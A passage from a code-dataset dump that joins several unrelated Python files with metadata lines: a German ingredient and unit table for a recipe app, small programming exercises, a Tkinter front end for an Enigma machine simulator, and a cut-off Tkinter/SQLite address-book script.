Gewürze\"), # ginger paste\n\n ## M a r m e l a d e\n (\"Pflaumenmarmelade\", \"Marmelade, Pflaumen-\", \"Konfitüren\"), # plum jam\n (\"Aprikosenmarmelade\", \"Marmelade, Aprikosen-\", \"Konfitüren\"), # apricot jam\n (\"Orangenmamalade\", \"Marmalade, Orangen-\", \"Konfitüren\"), # orange jam\n (\"Marmelade\", \"Marmelade\", \"Konfitüren\"), # jam - general\n (\"Erdbeermarmelade\", \"Marmelade, Erdbeer-\", \"Konfitüren\"), # strawberry jam\n (\"Himbeermarmelade\", \"Marmelade, Himbeer-\", \"Konfitüren\"), # raspberry jam\n (\"Erdnussbutter\", \"Erdnussbutter\", \"Konfitüren\"), # peanut butter\n (\"Nutella\", \"Nutella\", \"Konfitüren\"), # nussply\n (\"Sesammus\", \"Sesammus\", \"Konfitüren\"), # tahini - sesame spread\n (\"Honig\", \"Honig\", \"Konfitüren\"), # honey\n\n ## I n t e r n a t i o n a l\n (\"Tartex\", \"Tartex\", \"International\"), # tartex spread\n (\"Kokosmilch\", \"Kokusmilch\", \"International\"), # coconut milk\n (\"Kokoscreme\", \"Kokuscreme\", \"International\"), # coconut cream\n (\"grüne Currypaste\", \"Currypaste, grüne\", \"International\"), # green curry paste\n (\"rote Currypaste\", \"Currypaste, rote\", \"International\"), # red curry paste\n (\"Reisessig\", \"Essig, Reis-\", \"International\"), # rice vinegar\n (\"Salsa\", \"Salsa\", \"International\"), # salsam\n (\"Sesamkerne\", \"Sesamkerne\", \"International\"), # sesame seeds\n (\"Soja-Sauce\", \"Soja-Sauce\", \"International\"), # soy sauce\n (\"Sojacreme\", \"Sojacreme\", \"International\"), # soya cream\n (\"Bulgur\", \"Bulgur\", \"International\"), # bulgar\n (\"Couscous\", \"Couscous\", \"International\"), # couscous\n (\"Falafel\", \"Falafel\", \"International\"), # felafel\n (\"Tofu\", \"Tofu\", \"International\"), # tofu\n (\"Pak-choï\", \"Pak-choï\", \"Gemüse\"), # bok choy\n\n ## M i l c h p r o d u k t e\n (\"Milch\", \"Milch\", \"Milchprodukte\"), # milk, unspecified\n (\"Käse\", \"Käse, allgemeiner\", \"Milchprodukte\"), # cheese, any\n (\"Butter\", \"Butter\", \"Milchprodukte\"), # butter\n (\"Margarine\", \"Margarine\", \"Milchprodukte\"), #\n (\"Eier\", \"Eier\", \"Milchprodukte\"), # egg\n (\"frische Milch\", \"Milch, frische\", \"Milchprodukte\"), # milk\n (\"fettarme Milch\", \"Milch, fettarme\", \"Milchprodukte\"), # skimmed milk\n (\"H-Milch\", \"Milch, H-Milch\", \"Milchprodukte\"), # long-life milk\n (\"Sojamilch\", \"Milch, Sojamilch\", \"Milchprodukte\"), # soya milk\n (\"Buttermilch\", \"Milch, Buttermilch\", \"Milchprodukte\"), # buttermilk\n (\"Sauerrahm\", \"Sauerrahm\", \"Milchprodukte\"), # sour cream\n (\"Sahne\", \"Sahne\", \"Milchprodukte\"), #\n (\"Sahne 10% Fett\", \"Sahne, 10% Fett\", \"Milchprodukte\"), #\n (\"Sahne 15% Fett\", \"Sahne, 15% Fett\", \"Milchprodukte\"), #\n (\"Sahne 35% Fett\", \"Sahne, 35% Fett\", \"Milchprodukte\"), #\n (\"Joghurt\", \"Joghurt\", \"Milchprodukte\"), # yogurt\n (\"Quark\", \"Quark\", \"Milchprodukte\"), #\n (\"Speisequark Magerstufe\", \"Quark, Speise- Magerstufe\", \"Milchprodukte\"), #\n (\"Kräuterquark\", \"Quark, Kräuter\", \"Milchprodukte\"), #\n (\"Cheddar-Käse\", \"Käse, Cheddar\", \"Milchprodukte\"), # cheddar cheese\n (\"Hartkäse\", \"Käse, Hart-\", \"Milchprodukte\"), # general hard cheese\n (\"Hüttenkäse\", \"Käse, Hüttenkäse\", \"Milchprodukte\"), # cottage cheese\n (\"Schnittkäse\", \"Käse, Schnittkäse\", \"Milchprodukte\"), # cottage cheese\n (\"Fetakäse\", \"Käse, Fetakäse\", \"Milchprodukte\"), # feta cheese\n (\"Ziegenkäse\", \"Käse, Ziegenkäse\", \"Milchprodukte\"), # fresh cheese white goat\n (\"Schaffskäse\", \"Schaffskäse\", \"Milchprodukte\"), # sheeps cheese\n (\"Emmentaler\", \"Käse, Emmentalerkäse\", \"Milchprodukte\"), # emmental\n (\"Mozzarella\", \"Käse, Mozzarella\", \"Milchprodukte\"), # mozzarella cheese\n (\"Parmesan\", \"Käse, Parmesan\", \"Milchprodukte\"), # parmesan cheese\n (\"Provolone\", \"Käse, Provolone\", \"Milchprodukte\"), # provolone cheese\n (\"Ricotta\", \"Käse, Ricotta\", \"Milchprodukte\"), # ricotta cheese\n (\"Gouda\", \"Käse, Gouda\", \"Milchprodukte\"), # cheese Gouda\n (\"Brie\", \"Käse, Brie\", \"Milchprodukte\"), # cheese Brie\n (\"Streichkäse\", \"Käse, Steich\", \"Milchprodukte\"), # spreading cheese\n (\"Philladelphia\", \"Käse, Philladelphia\", \"Milchprodukte\"), # philladelphia cheese\n\n ## h e i ß e G e t r ä n k e\n (\"schwarzer Tee\", \"Tee, schwarzer\", \"Getränke, heiß\"), # black tea\n (\"gemahlener Kaffee, \", \"Kaffee, gemahlener\", \"Getränke, heiß\"), # ground coffee\n (\"gemahler entkoffeinierter Kaffee\", \"Kaffee, gemahlener entkoffeinierter\", \"Getränke, heiß\"), # decaff ground coffee\n (\"Kaffeefilter\", \"Kaffeefilter\", \"Getränke, heiß\"), # coffee filters\n (\"Kakao\", \"Kakao\", \"Getränke, heiß\"), # drinking chocolate\n (\"Carokaffee\", \"Carokaffee\", \"Getränke, heiß\"), # caro coffee\n (\"Früchtetee, \", \"Tee, Früchtetee\", \"Getränke, heiß\"), # fruit tea\n (\"Pfefferminztee\", \"Tee, Pfefferminztee\", \"Getränke, heiß\"), # peppermint tea\n (\"Hagebuttentee\", \"Tee, Hagebuttentee\", \"Getränke, heiß\"), # rosehip tea\n (\"Kamillentee\", \"Tee, Kamillentee\", \"Getränke, heiß\"), # camomile tea\n (\"Fencheltee\", \"Tee, Fencheltee\", \"Getränke, heiß\"), # fenchel tea\n (\"Rotbuschtee\", \"Tee, Rotbuschtee\", \"Getränke, heiß\"), # roobusch tea\n (\"Kräutertee\", \"Tee, Kräutertee\", \"Getränke, heiß\"), # herb tea\n (\"grüner Tee\", \"Tee, grüner\", \"Getränke, heiß\"), # green tea\n (\"Yogitee\", \"Tee, Yogitee\", \"Getränke, heiß\"), # yogi (ayurvedic) tea\n\n ## F l u ß i g k e i t e n\n (\"Tafelessig\", \"Essig, Tafel-\", \"Flüssigkeiten\"), # table vinegar\n (\"Obstessig\", \"Essig, Obst-\", \"Flüssigkeiten\"), # table vinegar\n (\"Balsamico-Essig\", \"Essig, Balsamico-\", \"Flüssigkeiten\"), # balsamic vinegar\n (\"Sonnenblumenöl\", \"Öl, Sonnenblumenöl\", \"Flüssigkeiten\"), # sunflower oil\n (\"Olivenöl\", \"Öl, Olivenöl\", \"Flüssigkeiten\"), # olive oil\n (\"Sesamöl\", \"Öl, Sesamöl\", \"Flüssigkeiten\"), # sesame oil\n (\"Pflanzenöl\", \"Öl, Pflanzenöl\", \"Flüssigkeiten\"), # vegetable oil\n (\"Sojaöl\", \"Öl, Sojaöl\", \"Flüssigkeiten\"), # soya oil\n (\"Weißwein\", \"Wein, weiß\", \"Flüssigkeiten\"), # white wine\n (\"Rotwein\", \"Wein, rot\", \"Flüssigkeiten\"), # red wine\n\n ## t h i n g y o u s h o u l d h a v e a t h o m e\n (\"Wasser\", \"Wasser\", \"Flüssigkeiten\") # water\n ]\n\n # THESE ARE STANDARD UNIT CONVERSIONS. You can simply translate unit names where\n # you know them. Eliminate entries that are untranslatable or don't exist in your\n # locale. And please add any additional units that you know of.\n # Each unit is of the following format:\n # (u\"unit1\",u\"unit2\"):conversion_factor, where unit1 contains conversion_factor X unit2\n # For example: 1 cup has 16 tablespoons.\n CONVERTER_TABLE = {\n (\"Tasse\", \"EL\"):16,\n (\"EL\", \"TL\"):3,\n (\"pt.\", \"Tasse\"):2,\n (\"qt.\", \"Tasse\"):4,\n (\"l\", \"ml\"):1000,\n (\"l\", \"cl\"):100,\n (\"l\", \"dl\"):10,\n (\"oz.\", \"g\"):28.35,\n (\"kg\", \"g\"):1000,\n (\"g\", \"mg\"):1000,\n (\"TL\", \"Tröpchen\"):76,\n (\"Dose, mittel\", \"g\"):400,\n (\"Dose, groß\", \"g\"):800,\n (\"Dose, klein\", \"g\"):200,\n (\"lb.\", \"oz.\"):16,\n (\"l\", \"qt.\"):1.057\n }\n\n\n # DENSITIES of common foods. This allows us to convert between mass and volume.\n # Translators: You may be best off translating the food names below, since lists\n # of food densities can be hard to come by!\n DENSITY_TABLE = {\n \"Wasser\": 1, # water\n \"Traubensaft\": 1.03, # juice, grape\n \"Bouillon, gemüse\": 1, # vegetable broth\n \"Bouillon, hühner\": 1, # broth, chicken\n \"Milch\": 1.029, # milk\n \"Milch entier\": 1.029, # milk, whole\n \"Milch, fettarm\": 1.033, # milk, skim\n \"Milch 2%\": 1.031, # milk, 2%\n \"Milch 1%\": 1.03, # milk, 1%\n \"Kokosmilch\": 0.875, # coconut milk\n \"Buttermilch\": 1.03, # buttermilk\n \"Sahne riche\": 0.994, # heavy cream\n \"Sahne légère\": 1.012, # light cream\n \"Sahne 11,5%\": 1.025, # half-and-half\n \"Honig\": 1.420, # honey\n \"Zucker\": 1.550, # sugar, white\n \"Salz\": 2.165, # salt\n \"Butter\": 0.911, # butter\n \"Pflanzen Öl\": 0.88, # oil, vegetable\n \"Oliven Öl\": 0.88, # oil, olive\n \"Sonnenblumen Öl\": 0.88, # oil, corn\n \"Sesam Öl\": 0.88, # oil, sesame\n \"Mehl\": 0.6, # flour, all purpose\n \"Vollkornmehl\": 0.6, # flour, whole wheat\n \"Stärke\": 0.6, # corn starch\n \"Zucker en poudre\": 0.6, # sugar, powdered\n \"Zucker glace\": 0.6 # sugar, confectioners\n }\n\n ### ORIGINAL TABLES FROM ENGLISH\n\n # Standard unit names and alternate unit names that might appear. For\n # example: u\"c.\" is our standard abbreviation for cup. u\"cup\",u\"c.\" or\n # u\"cups\" might appear in a recipe we are importing. Each item of this\n # list looks like this:\n #\n # [u\"standard\", [u\"alternate1\",u\"alternate2\",u\"alternate3\",...]]\n #\n # The first item should be the preferred abbreviation\n # The second item should be the full name of the unit\n # e.g. [u\"c.\", [u\"cup\",...]]\n #\n UNITS = [\n (\"ml\", [\"Milliliter\", \"milliliter\", \"Milliliters\", \"milliliters\", \"ml\", \"ml.\"]),\n (\"cl\", [\"Centiliter\", \"centiliter\", \"Centiliters\", \"centiliters\", \"cl\", \"cl.\"]),\n (\"dl\", [\"Deciliter\", \"deciliter\", \"Deciliters\", \"deciliters\", \"dl\", \"dl.\"]),\n (\"l\", [\"Liter\", \"Liters\", \"liter\", \"liters\", \"l.\", \"lit.\", \"l\"]),\n\n (\"g\", [\"Gramm\", \"Gramme\", \"gramm\", \"gramme\", \"g.\", \"g\", \"gram\", \"grams\"]),\n (\"mg\", [\"Milligramm\", \"milligramm\", \"Milligramme\", \"milligramme\", \"mg.\", \"mg\", \"milligram\", \"milligrams\"]),\n (\"kg\", [\"Kilogramm\", \"kilogramm\", \"Kilogramme\", \"kilogramme\", \"kg.\", \"kg\", \"kilogram\", \"kilograms\"]),\n\n (\"cm\", [\"Centimeter\", \"centimeter\", \"Centimeters\", \"centimeters\", \"cm\", \"cm.\"]),\n (\"mm\", [\"Millimeter\", \"millimeter\", \"Millimeters\", \"millimeters\", \"mm\", \"mm.\"]),\n (\"m\", [\"Meter\", \"meter\", \"Meters\", \"meters\", \"m\", \"m.\"]),\n\n (\"Tröpfchen\", [\"Tröpfchen\", \"tröpfchen\", \"troepfchen\", \"Troepfchen\", \"drop\", \"drops\"]),\n (\"TL\", [\"Teelöffel\", \"Teelöffeln\", \"teelöffel\", \"teelöffeln\", \"tl\", \"TL\", \"tsp\", \"tsp.\", \"tea spoon\", \"teaspoon\"]),\n (\"EL\", [\"Esslöffel\", \"Esslöffeln\", \"esslöffel\", \"esslöffeln\", \"el\", \"EL\", \"tbs\", \"tbsp\", \"tbs.\", \"tbsp.\", \"table spoon\", \"tablespoon\"]),\n (\"Tasse\", [\"Tasse\", \"Tassen\", \"tasse\", \"tassen\", \"cup\", \"c.\", \"cups\", \"Glas\", \"glas\", \"Glass\", \"glass\"]),\n (\"Becher\", [\"Becher\", \"becher\"]),\n\n (\"St.\", [\"St.\", \"Stück\", \"Stücke\", \"Stueck\", \"Stuecke\", \"Mal\", \"stück\", \"stücke\", \"stueck\", \"stuecke\", \"mal\", \"piece\", \"pieces\", \"St\", \"st\"]),\n (\"Dose, mittel\", [\"Dose, mittel\", \"dose, mittel\", \"mittlere Dose\", \"mittlere dose\"]),\n (\"Dose, groß\", [\"Dose, groß\", \"dose, groß\", \"größe Dose\", \"größe dose\"]),\n (\"Dose, klein\", [\"Dose, klein\", \"dose, klein\", \"kleine Dose\", \"kleine dose\"]),\n (\"Zeh\", [\"Zeh\", \"Zehen\", \"zeh\", \"zehen\"]), # garlic\n (\"Paket\", [\"Paket\", \"Pakete\", \"paket\", \"pakete\", \"Packung\", \"packung\", \"pack\"]),\n (\"Prise\", [\"Prise\", \"Prisen\", \"prise\", \"prisen\"]), # pinch\n (\"Bund\", [\"Bund\", \"Bunde\", \"bund\", \"bunde\"]), # bunch\n\n (\"lb.\", [\"Pfund\", \"pfund\", \"pound\", \"pounds\", \"lb\", \"lb.\", \"lbs.\"]),\n (\"oz.\", [\"ounce\", \"ounces\", \"oz\", \"oz.\"]),\n (\"qt.\", [\"quart\", \"qt.\", \"quarts\"]),\n (\"pt.\", [\"pint\", \"pt.\", \"pints\"]),\n (\"gallon\", [\"gallon\", \"gallons\", \"gal.\"]),\n\n ]\n\n METRIC_RANGE = (1,999)\n\n # The following sets up unit groups. Users will be able to turn\n # these on or off (American users, for example, would likely turn\n # off metric units, since we don't use them).\n # (User choice not implemented yet)\n UNIT_GROUPS = {\n 'metric mass':[('mg',METRIC_RANGE),\n ('g',METRIC_RANGE),\n ('kg',(1,None))],\n 'metric volume':[('ml',METRIC_RANGE),\n ('cl',(1,99)),\n ('dl',(1,9)),\n ('l',(1,None)),],\n 'imperial weight':[('oz.',(0.25,32)),\n ('lb.',(0.25,None)),\n ],\n 'imperial volume':[('Tröpfchen',(0,3)),\n ('TL',(0.125,3)),\n ('EL',(1,4)),\n ('Tasse',(0.25,6)),\n ('pt.',(1,1)),\n ('qt.',(1,3))]\n }\n\n # The units here need to correspond to the standard unit names defined\n # above in UNITS\n CROSS_UNIT_TABLE = {\n ## This if for units that require an additional\n ## bit of information -- i.e. to convert between\n ## volume and mass you need the density of an\n ## item. In these cases, the additional factor\n ## will be provided as an 'item' that is then looked\n ## up in the dictionary referenced here (i.e. the density_table)\n ## currently, 'density' is the only keyword used\n (\"pt.\", \"lb.\") :('density',1),\n (\"EL\", \"oz.\") :('density',0.5),\n (\"Tasse\", \"oz.\"):('density',8),\n (\"l\", \"kg\") :('density',1),\n (\"ml\", \"g\") :('density',1),\n }\n\n # The units here need to correspond to the standard unit names defined\n # in UNITS. These are some core conversions from mass-to-volume,\n # assuming a density of 1 (i.e. the density of water).\n VOL_TO_MASS_TABLE = {\n (\"pt.\", \"lb.\") : 1,\n (\"tbs.\", \"oz.\") : 0.5,\n (\"c.\", \"oz.\") : 8,\n (\"pt.\", \"oz.\") : 16,\n (\"ml\", \"g\") : 1,\n (\"ml\", \"mg\") : 1000,\n (\"ml\", \"kg\"): 0.001,\n (\"cl\", \"kg\"): 0.01,\n (\"cl\", \"g\") : 10,\n (\"dl\", \"kg\") : 0.1,\n (\"dl\", \"g\") : 100,\n (\"l\", \"kg\") : 1\n }\n\n ### From translator :\n ### FRENCH PART TO BE REVISED !!! US units != UK units != Canadian units !!!\n ### I will work on these later...\n # VOL_TO_MASS_TABLE = {\n # (u\"chop\",u\"lb\") : 1, #(warning, might not be accurate, see below)\n # (u\"c. à table\",u\"oz\") : 0.5,\n # (u\"tasse\",u\"oz\") : 8,\n # (u\"chop\",u\"oz\") : 20, #(warning, modified, see u\"chopine\" in granddictionnaire)\n # (u\"ml\",u\"g\") : 1,\n # (u\"ml\",u\"mg\") : 1000,\n # (u\"ml\",u\"kg\"): 0.001,\n # (u\"cl\",u\"kg\"): 0.01,\n # (u\"cl\",u\"g\") : 10,\n # (u\"dl\",u\"kg\") : 0.1,\n # (u\"dl\",u\"g\") : 100,\n # (u\"l\",u\"kg\") : 1}\n\n # TIME ABBREVIATIONS (this is new!)\n TIME_ABBREVIATIONS = {\n 'sec':'Sek.',\n 'min':'Min.',\n 'hr':'Std.'\n }\n\n IGNORE = [\"und\",\"mit\",\"von\",\"für\",\n \"kalt\",\"kalter\",\"kalte\",\"kaltes\",\"kalten\",\n \"warm\",\"warmer\",\"warme\",\"warmes\",\"warmen\",\n \"dünn\",\"dünner\",\"dünne\",\"dünnes\",\"dünnen\",\n \"dick\",\"dicker\",\"dicke\",\"dickes\",\"dicken\"\n ]\n\n NUMBERS: Mapping[float, Collection[str]] = {\n }\n\n # These functions are rather important! Our goal is simply to\n # facilitate look ups -- if the user types in u\"tomatoes\", we want to\n # find \"tomato.\" Note that the strings these functions produce will\n # _never_ be shown to the user, so it's fine to generate nonsense\n # words as well as correct answers -- our goal is to generate a list\n # of possible hits rather than to get the plural/singular form \"right\".\n\n @staticmethod\n def guess_singulars (s):\n # Note - German, here we're not only going to try to make nouns singular,\n # we could also get an adjective, so lets also take the adjectival endings off\n if len(s)<3: return []\n ret = []\n if s[-1]=='n':\n if s[-2]=='e':\n ret.append(s[0:-2]) # try chopping off 'en'\n if (s[-2]!='u') & (s[-2]!='o') & (s[-2]!='a') & (s[-2]!='i'):\n ret.append(s[0:-1]) # try chopping off the n\n\n if s[-1]=='s':\n ret.append(s[0:-1]) # try chopping off the s\n if s[-2]=='e':\n ret.append(s[0:-2]) # try chopping off 'es'\n\n if s[-1]=='e':\n ret.append(s[0:-1]) # try chopping off the 'e'\n\n if (s[-1]=='r') & (s[-2]=='e'):\n ret.append(s[0:-2]) # try chopping off the 'er'\n\n return ret\n\n @staticmethod\n def guess_plurals (s):\n # Ditto above, assume this could also be an adjective, so try adding the common agreements\n return [s+'n', s+'en', s+'e', s+'er', s+'s', s+'es']\n","repo_name":"thinkle/gourmet","sub_path":"gourmet/defaults/defaults_de.py","file_name":"defaults_de.py","file_ext":"py","file_size_in_byte":55915,"program_lang":"python","lang":"en","doc_type":"code","stars":342,"dataset":"github-code","pt":"43"} +{"seq_id":"33887171120","text":"def check(n):\n if len(n)%2==0: return 0\n if n[0]==n[1]: return 0\n if n[0]!=n[len(n)-1]: return 0\n for i in range(2,len(n),2):\n if n[0]!=n[i]: return 0\n return 1\nfor i in range(int(input())):\n n = input()\n if check(n): print(\"YES\")\n else: print(\"NO\")","repo_name":"HPhuonghub/Python-Code-Ptit","sub_path":"PY01055 SỐ XEN KẼ.py","file_name":"PY01055 SỐ XEN KẼ.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74548221568","text":"\"\"\"An implementation of the Enigma Machine in Python.\n\nThis is a toy project intending to implement the Enigma Machine as originally\ndesigned by Arthur Scherbius. Enigma was an electromechanical implementation of\na polyalphabetic substitution cypher. It's no longer considered\ncryptographically secure, but the device itself was fairly interesting.\n\nNo effort has been made to correct any of the cryptographic flaws in enigma;\nthis implementation is meant to be as faithful as possible. Additionally,\nsteps have been taken to attempt to emulate not just the Wehrmacht enigma, but\nthe commercial models as well. Additionally while a large number of rotor\nbindings can be found in the provided catalog.json, this is not exhaustive,\nand the module makes no effort to enforce the use of \"matching\" rotors.\n\nDevelopment was by Zac Adam-MacEwen. See the README.md for details.\n\n\"\"\"\n\n__version__ = \"1.2.0Dev\"\n\nfrom . import enigma\nfrom tkinter import *\nimport webbrowser\n\n# We really only need things to execute here if being called as main, such as `python -m python_enigma`\n\n\ndef test_button(): # TODO Remove when no longer relied upon\n print(\"Button Works!\")\n return\n\n\ndef display_about_window():\n about_window = Toplevel(window)\n box = LabelFrame(about_window, text=\"About Python Enigma\")\n about_blurb = \"This is a toy project intending to implement the Enigma Machine as originally \" \\\n \"designed by Arthur Scherbius. Enigma was an electromechanical implementation of \" \\\n \"a polyalphabetic substitution cypher. It's no longer considered \" \\\n \"cryptographically secure, but the device itself was fairly interesting.\\n\\n\" \\\n \"No effort has been made to correct any of the cryptographic flaws in enigma; \" \\\n \"this implementation is meant to be as faithful as possible. Additionally, \" \\\n \"steps have been taken to attempt to emulate not just the Wehrmacht enigma, but \" \\\n \"the commercial models as well.\\n\\nFurther information is available using the links below.\" \\\n \"\\n\\nThis is a work product of Kensho Security Labs,\" \\\n \" provided under the Apache 2.0 License.\"\n box.grid(row=0, column=0)\n text = Message(box, text=about_blurb, width=500)\n text.pack()\n ks_button = Button(box, text=\"Kensho Security Labs\", command=launch_kenshosec, width=15)\n gh_button = Button(box, text=\"Github Project Page\", command=launch_github, width=15)\n gh_button.pack()\n ks_button.pack()\n\n\ndef fill_wheel_states():\n wheel_state_raw = machine_used.wheel_pack.rotors.copy()\n wheel_state_raw.reverse() # wheels will now appear in visible order, as indexed.\n counter = 1\n for rotor in wheel_state_raw: # we can iterate over these to start filling the parent.\n readable_pos = enigma.num_to_alpha(rotor.position)\n wheel_id = rotor.name\n ringstellung = rotor.ringstellung\n new_wheel = LabelFrame(wheel_states, width=25, height=25, text=(\"%s\" % str(counter)))\n new_wheel.pack(side=LEFT)\n pos_var = StringVar()\n pos_var.set(readable_pos)\n pos_label = Label(new_wheel, text=\"Position:\")\n pos_label.grid(row=0, column=0)\n wheel_label = Label(new_wheel, text=\"Wheel:\")\n wheel_label.grid(row=0, column=1)\n wheel_position_setting = Entry(new_wheel, width=1, textvariable=pos_var)\n wheel_position_setting.grid_propagate(0)\n wheel_position_setting.grid(row=1, column=0)\n wheel_type = Label(new_wheel, text=wheel_id)\n wheel_type.grid(row=1, column=1)\n rings_label = Label(new_wheel, text=\"Ringstellung:\")\n rings_setting = Label(new_wheel, text=ringstellung)\n rings_label.grid(row=2, column=0)\n rings_setting.grid(row=2, column=1)\n counter += 1\n\ndef initialize_stock_enigma():\n use_these = [(\"Beta\", \"A\"), (\"I\", \"A\"), (\"II\", \"A\"), (\"III\", \"A\")]\n machine = enigma.Enigma(catalog=\"default\", stecker=None, stator=\"military\", rotors=use_these, reflector=\"UKW\",\n operator=True, word_length=5, ignore_static_wheels=False)\n return machine\n\n\ndef launch_kenshosec():\n webbrowser.open(\"https://www.kenshosec.com/Projects\")\n return\n\n\ndef launch_github():\n webbrowser.open(\"https://www.github.com/ZAdamMac/python-enigma\")\n return\n\n\nif __name__ == \"__main__\":\n machine_used = initialize_stock_enigma()\n window = Tk()\n window.title(\"Python Enigma v.%s\" % __version__)\n # this code block draws the window itself.\n input_pane = LabelFrame(window, text=\"Input\")\n input_pane.grid(column=0, row=0)\n input_field = Text(input_pane, width=80, height=24)\n input_field.pack()\n output_pane = LabelFrame(window, text=\"Output\")\n output_pane.grid(column=0, row=1)\n output_field = Text(output_pane, width=80, height=24)\n output_field.pack()\n window.update() # Needed because we're taking some dynamic sizes!\n settings_pane = LabelFrame(window, text=\"Machine State\", height=input_pane.winfo_height(), width=537)\n settings_pane.grid_propagate(0)\n settings_pane.grid(column=1, row=0)\n controls_pane = Frame(window)\n controls_pane.grid(column=1, row=1)\n\n # This code populates the various items that need to go in the settings pane\n # This pane uses grid geometry.\n wheel_selections = Button(settings_pane, command=test_button, text=\"Select Wheels\") # TODO Define Correct Command\n wheel_selections.grid_anchor(CENTER)\n wheel_selections.grid(column=0, row=0)\n stecker_config = Button(settings_pane, command=test_button, text=\"Steckerboard Config\")\n stecker_config.grid_anchor(CENTER)\n stecker_config.grid(column=1, row=0)\n wheel_states = LabelFrame(settings_pane, text=\"Wheel States\")\n wheel_states.grid_anchor(CENTER)\n #filler = Label(wheel_states, text=\"We don't fill this frame because that requires a function not yet defined!\")\n wheel_states.grid(row=1, columnspan=2)\n wheel_states.grid_anchor(CENTER)\n fill_wheel_states()\n #filler.pack()\n\n # This code populates the various items that need to go in the controls pane!\n go_button = Button(controls_pane, text=\"Process Message\", command=test_button, width=25) # TODO The Do!\n reset_button = Button(controls_pane, text=\"Reset State\", command=test_button, width=25) # TODO def\n credits_button = Button(controls_pane, text=\"About python_enigma\", command=display_about_window, width=25)\n go_button.grid(row=0)\n reset_button.grid(row=1)\n credits_button.grid(row=2)\n\n window.mainloop()\n","repo_name":"ZAdamMac/python-enigma","sub_path":"python_enigma/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6586,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"43"} +{"seq_id":"33961538888","text":"# leet_code 43, 字符串大数字乘法,找规律很重要 num1[i]*num[j]会出现在result[i+j]和result[i+j+1]中!\n\ndef reverse(string):\n reverse = ''\n for s in string:\n reverse = s + reverse\n return reverse\n\ndef multiply(num1: str, num2: str):\n if num1 == '0' or num2 == '0':\n return '0'\n max_scoop = 0\n result = [0] * 15000\n len1 = len(num1)\n len2 = len(num2)\n num1 = reverse(num1)\n num2 = reverse(num2)\n index_sum_max = len1 + len2 - 2\n for index_sum in range(index_sum_max + 1):\n for i in range(min(index_sum+1,len1)):\n j = index_sum - i\n if j >= len2:\n continue\n i_m_j = reverse(str(int(num1[i])*int(num2[j])))\n k = index_sum\n result[k] += int(i_m_j[0])\n max_scoop = k if k > max_scoop else max_scoop\n while result[k] >= 10:\n result[k] -= 10\n k+=1\n result[k] += 1\n max_scoop = k if k > max_scoop else max_scoop\n k+=1\n if len(i_m_j) > 1:\n k = index_sum+1\n result[k] += int(i_m_j[1])\n max_scoop = k if k > max_scoop else max_scoop\n while result[k] >= 10:\n result[k] -= 10\n k+=1\n result[k] += 1\n max_scoop = k if k > max_scoop else max_scoop\n return result[:max_scoop+1]\n\nif __name__ == '__main__':\n result = multiply('9999','9999')\n sum_reverse = ''.join([str(i) for i in result])\n sum = reverse(sum_reverse)\n pass","repo_name":"dyy401453043/algorithm_interview","sub_path":"big_number_multiply.py","file_name":"big_number_multiply.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"17913079469","text":"import sqlite3\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\n\r\n# ühendan andmebaasiga\r\nconn = sqlite3.connect('database.db')\r\nc = conn.cursor()\r\n\r\n# Teen tabeli, kui juba olemas pole\r\nc.execute('''CREATE TABLE IF NOT EXISTS inimesed\r\n (id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n nimi TEXT,\r\n aaddress TEXT,\r\n telo TEXT)''')\r\n\r\n# Lisan info\r\nc.execute(\"INSERT INTO inimesed (nimi, aaddress, telo) VALUES ('Ülle Doos', 'kooli 7', '+372 1234 1234')\")\r\nc.execute(\"INSERT INTO inimesed (nimi, aaddress, telo) VALUES ('Jann Uuspõld', 'aafrika tn 13', '+372 1623 5678')\")\r\nc.execute(\"INSERT INTO inimesed (nimi, aaddress, telo) VALUES ('Rita Kurk', 'tallinna mnt 23', '+372 4321 9012')\")\r\n\r\n# salvestan muudatused\r\nconn.commit()\r\n\r\n# teen tkinteri akna\r\nroot = tk.Tk()\r\nroot.title(\"inimeste andmed\")\r\n\r\n# loon andmete kuvamiseks treeview\r\ntree = ttk.Treeview(root, columns=(\"nimi\", \"aaddress\", \"telo\"))\r\ntree.heading(\"#0\", text=\"ID\")\r\ntree.column(\"#0\", width=50)\r\ntree.heading(\"nimi\", text=\"Nimi\")\r\ntree.column(\"nimi\", width=150)\r\ntree.heading(\"aaddress\", text=\"Aaddress\")\r\ntree.column(\"aaddress\", width=200)\r\ntree.heading(\"telo\", text=\"Telo\")\r\ntree.column(\"telo\", width=100)\r\ntree.grid(row=0, column=0, padx=5, pady=5)\r\n\r\n# funktsioon andmete kuvamiseks treeview's\r\ndef show_data():\r\n \r\n # kustutan olemasolevad andmed\r\n for child in tree.get_children():\r\n tree.delete(child)\r\n \r\n # loen andmed andmebaasist\r\n c.execute(\"SELECT * FROM inimesed\")\r\n data = c.fetchall()\r\n \r\n # kuvan andmed treeview's\r\n for row in data:\r\n tree.insert(\"\", \"end\", text=row[0], values=(row[1], row[2], row[3]))\r\n\r\n# funktsioon rohkema info lisamiseks andmebaasi\r\ndef add_entry():\r\n name = name_entry.get()\r\n address = address_entry.get()\r\n phone = phone_entry.get()\r\n c.execute(\"INSERT INTO inimesed (nimi, aaddress, telo) VALUES (?, ?, ?)\", (name, address, phone))\r\n conn.commit()\r\n show_data()\r\n name_entry.delete(0, tk.END)\r\n address_entry.delete(0, tk.END)\r\n phone_entry.delete(0, tk.END)\r\n\r\n# funktsioon valitud rea kustutamiseks andmebaasist\r\ndef delete_entry():\r\n selected = tree.focus()\r\n if selected:\r\n item_id = int(tree.item(selected)[\"text\"])\r\n c.execute(\"DELETE FROM inimesed WHERE id=?\", (item_id,))\r\n conn.commit()\r\n show_data()\r\n\r\n# loon sildid ja tekstiväljad uue kirje lisamiseks\r\nname_label = tk.Label(root, text=\"Nimi\")\r\nname_label.grid(row=1, column=0, padx=5, pady=5)\r\nname_entry = tk.Entry(root)\r\nname_entry.grid(row=1, column=1, padx=5, pady=5)\r\n\r\naddress_label = tk.Label(root, text=\"Aaddress\")\r\naddress_label.grid(row=2, column=0, padx=5, pady=5)\r\naddress_entry = tk.Entry(root)\r\naddress_entry.grid(row=2, column=1, padx=5, pady=5)\r\n\r\nphone_label = tk.Label(root, 